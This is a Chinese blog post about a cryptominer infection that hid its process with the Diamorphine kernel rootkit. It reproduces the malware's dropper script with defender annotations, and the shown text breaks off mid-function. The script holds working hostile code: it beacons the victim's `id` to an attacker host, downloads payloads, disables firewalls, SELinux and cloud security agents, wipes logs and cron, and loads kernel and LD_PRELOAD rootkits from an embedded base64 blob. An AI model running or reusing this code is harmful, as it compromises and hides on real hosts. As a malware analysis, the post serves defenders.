Top有CPU占用但找不到占用的进程 (被病毒隐藏了)
背景
今日一备用服务器上的服务停止,发现又感染挖矿病毒。且在寻找它的进程时十分波折,把一些过程记录一下。
太长不看版
病毒通过加载内核模块(diamorphine rootkit)隐藏了特定进程。病毒把自己的可执行文件命名为"[kswapd0]",并通过systemd开机自启。kswapd0是一个正常运行的系统中也存在的进程,但是病毒程序运行后在ps、top中只能看到正常的kswapd0进程,CPU占用0%。而且,在netstat中列出的出入方向连接,相应的PID都是-。若将其他任意可执行文件更改为这个名字,也会被隐藏。直接重置系统后,该问题解决。
排查过程
业务端口被病毒脚本定时kill,跑不起来,遂开始定位病毒进程。
发现系统响应缓慢,于是想着先运行top,看到ni占比50%(服务器共2核),意味着有一个CPU核心被低优先级进程稳定占据。但当我按CPU占用排序的时候,最高的是top本身,占用0.5%左右,没有更高的了。这时非常疑惑,怎么光有占用没有进程呢,用ps aux查看也没有。netstat看到有大量的出方向连接,而且相应的PID都是-,搜索资料也没有解释原因,正常情况下只有TIME_WAIT状态下的连接才可能出现-。
随后根据云报警中提供的攻击脚本链接下载了攻击脚本。找到几个systemd文件,去相应的位置看到了几个启动项。将它们禁用、停止,CPU占用率就恢复正常了。(这个挖矿程序还把自己的CPU使用率限制了一下,跟别的挖矿病毒很不一样)。但是此时一些定时脚本还活跃着(在/root/.profile中),每分钟都会执行一些特定工作,包括扫描其他的挖矿程序并kill掉。我们的服务端口有幸和某个挖矿程序一样,所以才总是启动不起来。
在启动项中看到ExecStart中指向的可执行文件位置,测试一下才发现这几个进程都是被隐藏的。这时候就意识到这应该是系统被hook了(其实可以从下面的脚本中看到是加载了diamorphine rootkit模块,见下文hid函数部分),也没必要再纠结进程到底是怎么隐藏的了,直接备份数据重装系统,结束。
补充
- rootkit LKM之 “Diamorphine” - jozxing
- 聊一聊Linux下进程隐藏的常见手法及侦测手段
- 那些年我们受到的网络攻击 - 这篇博客所描述的病毒应该是同款,但是症状好像不完全一样
- 贴上病毒主要脚本如下 (好像不能设置跳转,将就一下吧)
crontab_sh
# 入口脚本(省略了两处特别长的部分)
# 下载来源:h*t*t*p://107.189.3.150/b2f628/cronb.sh #####
#!/bin/bash
# --- Analyst annotations (defender view) ---
# Stage 1: beacon. The output of `id` (victim account name, uid and
# groups) is sent to the operator's server as a URL path component.
# Any egress to this host is itself an indicator of compromise.
us=$(id)
curl "http://oracle.zzhreceive.top/b2f628/idcheck/$us" >>/dev/null
# `cd1` is not a standard tool; presumably a renamed copy of curl dropped
# by another stage. If it is absent the line just fails and the script
# continues (no `set -e`).
cd1 "http://oracle.zzhreceive.top/b2f628/idcheck/$us" >>/dev/null
ulimit -n 65535
# Miner working directory. A hidden directory under /var/tmp is the first
# on-disk IoC for this family; it is also exported so child processes
# (the functions below) find it.
export MOHOME=/var/tmp/.copydie
mkdir $MOHOME -p
# Stage 2: "already running" check, repeated for three miner variants.
# The miner's log file mtime is used as a heartbeat: if it was modified
# within the last 600 s the miner is considered alive and the dropper
# exits (exit 1); otherwise installation continues. The three log paths
# are persistent on-disk IoCs even after the processes are hidden.
if [ -f "$MOHOME/[kswapd0].log" ]
then
echo "process possible running"
current=$(date +%s)
# Unquoted, `[kswapd0].log` is a bracket glob; it only reaches stat as the
# literal name because no single-character match (e.g. k.log) exists.
last_modified=$(stat -c "%Y" $MOHOME/[kswapd0].log)
if [ $(($current-$last_modified)) -gt 600 ]; then
echo "no miner process running";
else
echo "miner process running"
exit 1
fi
else
echo "miner process not running"
fi
# Same heartbeat check for a second variant that hides as "[crypto]".
if [ -f "/usr/share/[crypto].log" ]
then
echo "process possible running"
current=$(date +%s)
last_modified=$(stat -c "%Y" /usr/share/[crypto].log)
if [ $(($current-$last_modified)) -gt 600 ]; then
echo "no miner process running";
else
echo "miner process running"
exit 1
fi
else
echo "miner process not running"
fi
# Third variant, hiding as "[ext4]" under another hidden /var/tmp dir.
if [ -f "/var/tmp/.system/[ext4].log" ]
then
echo "process possible running"
current=$(date +%s)
last_modified=$(stat -c "%Y" /var/tmp/.system/[ext4].log)
if [ $(($current-$last_modified)) -gt 600 ]; then
echo "no miner process running";
else
echo "miner process running"
exit 1
fi
else
echo "miner process not running"
fi
# Stage 3: defense impairment and anti-forensics.
# Local syslog is deleted outright — only logs already forwarded off-host
# survive this, which is the main detection/forensics takeaway.
rm -rf /var/log/syslog
# Clear immutable/undeletable/append-only flags so the malware can write
# and later lock its own files in the temp directories.
chattr -iua /tmp/
chattr -iua /var/tmp/
# Host firewall off and all filter rules flushed (opens egress to pool/C2).
ufw disable
iptables -F
# NMI watchdog disabled, both live and persisted in sysctl.conf; check
# /etc/sysctl.conf for this appended line during cleanup.
sudo sysctl kernel.nmi_watchdog=0
sysctl kernel.nmi_watchdog=0
echo '0' >/proc/sys/kernel/nmi_watchdog
echo 'kernel.nmi_watchdog=0' >>/etc/sysctl.conf
# Unlock root's SSH directory ahead of the key backdoor (see makesshaxx).
chattr -iae /root/.ssh/
chattr -iae /root/.ssh/authorized_keys
# Remove artifacts of rival infections.
rm -rf /tmp/addres*
rm -rf /tmp/walle*
rm -rf /tmp/keys
# Cloud workload-protection agents are detected via ps and removed with
# the vendors' own uninstall scripts (Aliyun Aegis / bcm-agent, fetched
# over plain HTTP; Tencent YunJing / stargate / barad). A lost agent
# heartbeat in the cloud console is therefore a useful alert signal.
if ps aux | grep -i '[a]liyun'; then
curl http://update.aegis.aliyun.com/download/uninstall.sh | bash
curl http://update.aegis.aliyun.com/download/quartz_uninstall.sh | bash
pkill aliyun-service
rm -rf /etc/init.d/agentwatch /usr/sbin/aliyun-service
rm -rf /usr/local/aegis*
systemctl stop aliyun.service
systemctl disable aliyun.service
service bcm-agent stop
yum remove bcm-agent -y
apt-get remove bcm-agent -y
elif ps aux | grep -i '[y]unjing'; then
/usr/local/qcloud/stargate/admin/uninstall.sh
/usr/local/qcloud/YunJing/uninst.sh
/usr/local/qcloud/monitor/barad/admin/uninstall.sh
fi
# Aliyun CloudMonitor (either packaging) is stopped and uninstalled too.
if [ -f /usr/local/cloudmonitor/wrapper/bin/cloudmonitor.sh ]; then
/usr/local/cloudmonitor/wrapper/bin/cloudmonitor.sh stop && /usr/local/cloudmonitor/wrapper/bin/cloudmonitor.sh remove && rm -rf /usr/local/cloudmonitor
else
export ARCH=amd64
if [ -f /usr/local/cloudmonitor/CmsGoAgent.linux-${ARCH} ]; then
/usr/local/cloudmonitor/CmsGoAgent.linux-${ARCH} stop && /usr/local/cloudmonitor/CmsGoAgent.linux-${ARCH} uninstall && rm -rf /usr/local/cloudmonitor
else
echo "ali cloud monitor not running"
fi
fi
# Mandatory access control off: SELinux permissive now and disabled on
# next boot, AppArmor stopped and disabled.
setenforce 0
echo SELINUX=disabled >/etc/selinux/config
service apparmor stop
systemctl disable apparmor
service aliyun.service stop
systemctl disable aliyun.service
# Anything still matching the agent names is killed with SIGKILL.
ps aux | grep -v grep | grep 'aegis' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'Yun' | awk '{print $2}' | xargs -I % kill -9 %
rm -rf /usr/local/aegis
# Stage 4: payload configuration.
# The ".jpg" names are masquerading: SetupMoneroOcean below passes the
# downloaded file straight to `tar xf`, so these are tarballs, not images.
# MOD and STOCK point at the same operator-hosted build; the GitHub URL is
# the public xmrig release used as a last resort.
MOxmrigMOD=http://bbq.zzhreceive.top/midd.jpg
MOxmrigSTOCK=http://bbq.zzhreceive.top/midd.jpg
miner_url=https://github.com/xmrig/xmrig/releases/download/v6.10.0/xmrig-6.10.0-linux-static-x64.tar.gz
miner_url_backup=http://oracle.zzhreceive.top/b2f628/father.jpg
config_url=http://oracle.zzhreceive.top/b2f628/cf.jpg
config_url_backup=http://oracle.zzhreceive.top/b2f628/cf.jpg
# Operator's Monero wallet (with worker suffix) — useful for correlating
# infections across hosts and for pool-side abuse reports.
WALLET=43Xbgtym2GZWBk87XiYbCpTKGPBTxYZZWi44SWrkqqvzPZV6Pfmjv3UHR6FDwvPgePJyv9N5PepeajfmKp1X71EW7jx4Tpz.peter44d
VERSION=2.9
# Re-enables administration tools that a rival infection (or this
# family's own LockDownTheSystem) may have disabled: strips the immutable
# flag and restores +x on chmod/chattr, then on package managers, kill /
# pkill and the shutdown/reboot binaries, re-locking each with +i after.
# `tntrecht` is the malware's private copy of chattr (created in
# KILLMININGSERVICES). Not invoked in this sample: its only call site is
# the commented-out `#FixTheSystem` below.
# Responder note: where this did run, system binaries carry the immutable
# flag, so package upgrades of these files fail until `chattr -i`.
function FixTheSystem(){
echo "begin FixTheSystem"
tntrecht -i /bin/chmod || chattr -i /bin/chmod
setfacl -m u::x /bin/chmod
tntrecht -i /bin/chattr || chattr -i /bin/chattr
chmod +x /bin/chattr || setfacl -m u::x /bin/chattr
SYSFILEARRAY=(/usr/bin/apt /usr/bin/apt-get /bin/yum /bin/kill /usr/lib/klibc/bin/kill /usr/bin/pkill /bin/pkill /sbin/shutdown /sbin/reboot /sbin/poweroff /sbin/telinit)
for SYSFILEBIN in ${SYSFILEARRAY[@]}; do
tntrecht -i $SYSFILEBIN
chattr -i $SYSFILEBIN
setfacl -m u::x /bin/chmod
setfacl -m u::x $SYSFILEBIN
chmod +x $SYSFILEBIN
chattr +i $SYSFILEBIN
tntrecht +i $SYSFILEBIN
done
# The array is expanded unquoted, so "/home/*/.ssh/" globs to every
# user's .ssh directory at loop time; only the immutable flag is removed.
SYSTEMFILEARRAY=("/root/.ssh/" "/home/*/.ssh/" "/etc/passwd" "/etc/shadow" "/etc/sudoers" "/etc/ssh/" "/etc/ssh/sshd_config")
for SYSTEMFILE in ${SYSTEMFILEARRAY[@]}; do
tntrecht -iR $SYSTEMFILE 2>/dev/null 1>/dev/null
chattr -iR $SYSTEMFILE 2>/dev/null 1>/dev/null
done
setfacl -m u::x /bin/chmod
}
# Evicts competing miners: processes are located by peer IP/port in
# netstat or by command-line substrings in ps, then SIGKILLed; their
# files, docker containers/images and all cron state are removed.
# Responder note: the cron wipe at the end is indiscriminate, so legitimate
# crontabs (/etc/crontab, /etc/cron.d, per-user spools) must be restored
# from backup or configuration management after cleanup.
kill_miner_proc()
{
netstat -anp | grep 185.71.65.238 | awk '{print $7}' | awk -F'[/]' '{print $1}' | xargs -I % kill -9 %
netstat -anp | grep :5555 | awk '{print $7}' | awk -F'[/]' '{print $1}' | grep -v "-" | xargs -I % kill -9 %
ps aux | grep -v grep | grep ':5555' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep '/tmp/65ccE*' | awk '{print $2}' | xargs -I % kill -9 %
# L2Jpbi9iYXN is the base64 prefix of "/bin/bas…" — catches rivals that
# launch via a base64-encoded command line.
pgrep -f L2Jpbi9iYXN | xargs -I % kill -9 %
pkill -f biosetjenkins
rm -rf /usr/bin/config.json
rm /opt/atlassian/confluence/bin/1.sh
rm -rf /var/tmp/f41
# A rival's script is truncated to empty and then locked immutable so it
# cannot be rewritten.
>/etc/newsvc.sh
chattr +ia /etc/newsvc.sh
sleep 1
chattr -i /usr/lib/systemd/systemd-update-daily
docker ps | grep "pocosow" | awk '{print $1}' | xargs -I % docker kill %
docker images -a | grep "pocosow" | awk '{print $3}' | xargs -I % docker rmi -f %
#echo SELINUX=disabled >/etc/selinux/config
service apparmor stop
systemctl disable apparmor
service aliyun.service stop
systemctl disable aliyun.service
systemctl stop pnsd.service
sudo systemctl stop pastebin.service
# (many rm and kill lines omitted here by the blog author)
rm -rf /var/.httpd/*
rm -rf /etc/.httpd/*
rm -rf /var/tmp/.crypto/
rm -rf /var/tmp/.apache/*
rm -rf /usr/share/\[ddns\]*
ps aux | grep -v grep | grep 'Yun' | awk '{print $2}' | xargs -I % kill -9 %
# Full cron wipe: unlock, remove the caller's crontab, delete every spool
# and system crontab.
chattr -R -ia /var/spool/cron
chattr -ia /etc/crontab
chattr -R -ia /etc/cron.d
chattr -R -ia /var/spool/cron/crontabs
crontab -r
rm -rf /var/spool/cron/*
rm -rf /etc/cron.d/*
rm -rf /var/spool/cron/crontabs
rm -rf /etc/crontab
}
# Competitor cleanup runs immediately, before the rest is even defined.
kill_miner_proc
# Kills "suspicious" processes by two heuristics, sparing only those whose
# cmdline contains kswapd0 (this family's own miner name):
#  1. any process whose /proc/PID/exe path contains "/tmp";
#  2. any process at >= 40% CPU.
# Heuristic 2 is what makes this dropper destructive to hosts: a busy
# legitimate service is SIGKILLed every time the script runs, which is
# plausibly the outage described in the write-up above.
kill_sus_proc()
{
# The header line "PID" from ps yields a nonexistent /proc path; ls fails,
# grep then exits 1 and the entry is skipped.
ps axf -o "pid"|while read procid
do
ls -l /proc/$procid/exe | grep /tmp
# Note the inverted test: anything other than "grep found no match"
# (including a grep error, status 2) leads to the kill branch.
if [ $? -ne 1 ]
then
cat /proc/$procid/cmdline| grep -a -E "kswapd0"
if [ $? -ne 0 ]
then
kill -9 $procid
else
echo "don't kill"
fi
fi
done
# CPU-based sweep: column 2 of `ps -o "pid %cpu"`.
ps axf -o "pid %cpu" | awk '{if($2>=40.0) print $1}' | while read procid
do
cat /proc/$procid/cmdline| grep -a -E "kswapd0"
if [ $? -ne 0 ]
then
kill -9 $procid
else
echo "don't kill"
fi
done
}
# Process sweep runs now; FixTheSystem is defined above but the author
# left its call disabled.
kill_sus_proc
#FixTheSystem
# Forces Google public DNS into /etc/resolv.conf and makes the file
# immutable. The `||` only guards the first chattr; everything after the
# first `;` runs unconditionally, so a nameserver line is appended on
# every invocation regardless of the grep result, and the immutable flag
# then blocks DHCP/resolvconf/NetworkManager from managing the file.
# Responder note: `chattr -i /etc/resolv.conf` before repairing DNS.
function SetupNameServers(){
grep -q 8.8.8.8 /etc/resolv.conf || chattr -i /etc/resolv.conf 2>/dev/null 1>/dev/null; tntrecht -i /etc/resolv.conf 2>/dev/null 1>/dev/null; echo "nameserver 8.8.8.8" >> /etc/resolv.conf; chattr +i /etc/resolv.conf 2>/dev/null 1>/dev/null; tntrecht +i /etc/resolv.conf 2>/dev/null 1>/dev/null
grep -q 8.8.4.4 /etc/resolv.conf || chattr -i /etc/resolv.conf 2>/dev/null 1>/dev/null; tntrecht -i /etc/resolv.conf 2>/dev/null 1>/dev/null; echo "nameserver 8.8.4.4" >> /etc/resolv.conf; chattr +i /etc/resolv.conf 2>/dev/null 1>/dev/null; tntrecht +i /etc/resolv.conf 2>/dev/null 1>/dev/null
}
SetupNameServers
# First pass at cron: unlock the spool and drop the invoking user's
# crontab; clean_cron below repeats this more thoroughly.
chattr -iR /var/spool/cron/
tntrecht -iR /var/spool/cron/
crontab -r
# Unlocks and deletes every cron location (system crontab, cron.d, user
# spools), using both the real chattr and the malware's `tntrecht` copy.
# All legitimate scheduled jobs on the host are lost; restore them from
# backup or configuration management during recovery.
function clean_cron(){
chattr -R -ia /var/spool/cron
tntrecht -R -ia /var/spool/cron
chattr -ia /etc/crontab
tntrecht -ia /etc/crontab
chattr -R -ia /etc/cron.d
tntrecht -R -ia /etc/cron.d
chattr -R -ia /var/spool/cron/crontabs
tntrecht -R -ia /var/spool/cron/crontabs
crontab -r
rm -rf /var/spool/cron/*
rm -rf /etc/cron.d/*
rm -rf /var/spool/cron/crontabs
rm -rf /etc/crontab
}
# Wipe cron, then lock it (lock_cron) so rivals and admins cannot re-add jobs.
clean_cron
# Recreates an empty /etc/crontab and sets immutable+append-only on all
# cron directories, so `crontab -e` and package-installed cron.d files
# fail afterwards. Responder note: `chattr -R -ia` these paths before
# reinstating jobs.
function lock_cron()
{
chattr -R +ia /var/spool/cron
tntrecht -R +ia /var/spool/cron
touch /etc/crontab
chattr +ia /etc/crontab
tntrecht +ia /etc/crontab
chattr -R +ia /var/spool/cron/crontabs
tntrecht -R +ia /var/spool/cron/crontabs
chattr -R +ia /etc/cron.d
tntrecht -R +ia /etc/cron.d
}
lock_cron
# Credential discovery: reports whether SSH private keys and AWS
# credential files exist. In this sample the function only echoes to
# stdout — no exfiltration is visible here, but the presence of the check
# signals the operator's interest in lateral movement and cloud keys.
# The "/home/*" patterns are quoted, so the glob is not expanded and those
# two tests never match as written.
function CheckAboutSomeKeys(){
if [ -f "/root/.ssh/id_rsa" ]
then
echo 'found: /root/.ssh/id_rsa'
fi
if [ -f "/home/*/.ssh/id_rsa" ]
then
echo 'found: /home/*/.ssh/id_rsa'
fi
if [ -f "/root/.aws/credentials" ]
then
echo 'found: /root/.aws/credentials'
fi
if [ -f "/home/*/.aws/credentials" ]
then
echo 'found: /home/*/.aws/credentials'
fi
}
CheckAboutSomeKeys
# Drops and executes a secondary payload as /usr/bin/bioset if it is not
# already present (the name mimics the kernel's bioset worker threads).
# Uses loadthisfile, which is defined further down; no call to `back` is
# visible in this excerpt. IoC: an executable at /usr/bin/bioset.
function back(){
if [ -f "/usr/bin/bioset" ]; then
echo 'FOUND: bioset'
else
echo 'MISSING: bioset'
loadthisfile http://oracle.zzhreceive.top/b/apa.jpg /usr/bin/bioset
chmod +x /usr/bin/bioset
cd /usr/bin && ./bioset
fi
}
function hid(){
DIA_TAR='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'
# The kernel rootkit install below (setup_dia) is gated on this being root.
CHECK_WHOAMI=`whoami`
# Fallback when the kernel module cannot be built: a stub that only prints
# a message — no userland hiding is actually performed from here.
function old_school_hide(){
echo "bash hide"
}
# Builds and loads the Diamorphine LKM rootkit from the embedded $DIA_TAR
# blob, then asks it to hide the miner. This is the mechanism behind the
# "CPU used but no process visible" symptom in the write-up.
# Detection/forensics notes:
#  - gcc/make/kmod and kernel headers get installed on a production host;
#  - /var/tmp/.../dia/ (three-dot directory) holds the sources and .ko;
#  - /lib/modules/$(uname -r)/build may be replaced by a symlink to a
#    different kernel's headers;
#  - once loaded, the hidden miner shows 0% CPU in top/ps while the ni/us
#    totals stay high, and netstat shows connections with PID "-".
# A module built against mismatched headers is normally rejected at
# insmod time, so a successful load implies matching headers were present.
function setup_dia(){
chattr -ia / /etc/ /tmp/ /var/ /var/tmp/ 2>/dev/null
chattr -R -ia /tmp/ /var/tmp/ 2>/dev/null
chmod 1777 /tmp/ /var/tmp/ 2>/dev/null
# Toolchain + headers via whichever package manager exists.
if type yum 2>/dev/null 1>/dev/null; then yum clean all ; yum -y install gcc make kmod ; yum -y install epel-release ;yum -y install elfutils-libelf-devel; yum list|grep kernel-devel|awk '{print $1}'|xargs yum -y install; fi
if type apt 2>/dev/null 1>/dev/null; then apt update --fix-missing ; apt-get -y install gcc make kmod ; apt-get -y install elfutils-libelf-devel;apt-get -y install linux-headers-$(uname -r) ; fi
if type apk 2>/dev/null 1>/dev/null; then apk update 2>/dev/null 1>/dev/null; apk add linux-headers 2>/dev/null ; fi
if [ ! -d "/var/tmp/.../dia/" ]; then mkdir -p /var/tmp/.../dia/ ; fi
# Source tarball is carried inline as base64 (see $DIA_TAR above).
echo $DIA_TAR | base64 -d > /var/tmp/.../dia/dia.tar.gz
tar xvf /var/tmp/.../dia/dia.tar.gz -C /var/tmp/.../dia/
rm -f /var/tmp/.../dia/dia.tar.gz
cd /var/tmp/.../dia/
kdir=/usr/src/kernels/$(uname -r)/
test -d /lib/modules/$(uname -r)/build
if [ $? -ne 0 ]
then
echo "build directory not exist,try to create soft link to /usr/src/kernels/"
test -d $kdir
if [ $? -ne 0 ]
then
echo "uname -r result is not eqel exist kernel version,try to link other version "
# No exact headers: tries every installed kernel-devel tree in turn,
# relinking the running kernel's build dir to each and rebuilding.
for kdir in $(ls -lrt /usr/src/kernels/|grep -v total|awk '{print $NF}')
do
cd /lib/modules/$(uname -r)/ && rm -rf build && ln -s /usr/src/kernels/$kdir/ ./build
cd /var/tmp/.../dia && make
done
else
cd /lib/modules/$(uname -r)/ && rm -rf build && ln -s /usr/src/kernels/$kdir/ ./build
cd /var/tmp/.../dia && make
fi
else
echo "build directory exist ,eqel kernel version"
cd /var/tmp/.../dia && make
fi
if [ -f "/var/tmp/.../dia/diamorphine.ko" ]; then
insmod diamorphine.ko
# Locates the miner by its pid-file path in ps and sends signal 31, the
# signal Diamorphine uses to toggle hiding of a PID. The stray `)` inside
# the backticks is a syntax error at substitution time, so as printed
# ROOTMO stays empty and the signal is never sent — likely a transcription
# artifact rather than the deployed code.
ROOTMO=`ps aux | grep -v grep | grep '/var/tmp/.copydie/\[kswapd0\].pid' | awk '{print $2}')`
if [ ! -z "$ROOTMO" ]; then kill -31 $ROOTMO ; fi
else echo 'build dia fail!'
old_school_hide
fi
}
# Rootkit install only as root; shell history is then cleared (anti-
# forensics — rely on auditd/remote logging rather than .bash_history).
if [ "$CHECK_WHOAMI" = "root" ]; then setup_dia ; fi
history -c
clear
}
# Downloader helper: loadthisfile URL DEST. Unlocks and deletes any
# existing DEST, then tries curl and wget plus several odd names (`cur`,
# `cdl`, `wge`, `wdl`) — presumably renamed copies of the same tools
# staged by another stage to evade simple command-name monitoring.
# `mchattr` is likewise not a standard tool.
function loadthisfile(){
GETFROM=$1
PUTITTO=$2
if [ -f "$PUTITTO" ]; then mchattr -i $PUTITTO 2>/dev/null 1>/dev/null ; chattr -i $PUTITTO 2>/dev/null 1>/dev/null ; tntrecht -i $PUTITTO 2>/dev/null 1>/dev/null ; rm -f $PUTITTO 2>/dev/null 1>/dev/null ; fi
curl -L --progress-bar $GETFROM -o $PUTITTO || cur -L --progress-bar $GETFROM -o $PUTITTO || cdl -L --progress-bar $GETFROM -o $PUTITTO || wget $GETFROM -O $PUTITTO || wge $GETFROM -O $PUTITTO || wdl $GETFROM -O $PUTITTO
}
# Userland (LD_PRELOAD) rootkit: writes five shared-object paths into
# /etc/ld.so.preload so every dynamically linked program loads them, and
# (if kswapd0.so is not yet present) fetches the .so bundle into
# /usr/local/lib. The preload file is written with `>`, replacing any
# existing content, then locked immutable.
# Responder note: on most distributions /etc/ld.so.preload does not exist
# at all; a non-empty one is a strong indicator. `chattr -ia` it before
# removal, and use a statically linked toolset (e.g. busybox) for triage
# since preloaded libraries can filter what ps/ls/netstat report.
function SecureTheSystem(){
if [ -f /usr/local/lib/kswapd0.so ]
then
echo "hide file exist" 2>/dev/null 1>/dev/null
grep kswapd0.so /etc/ld.so.preload
if [ $? != 0 ]
then
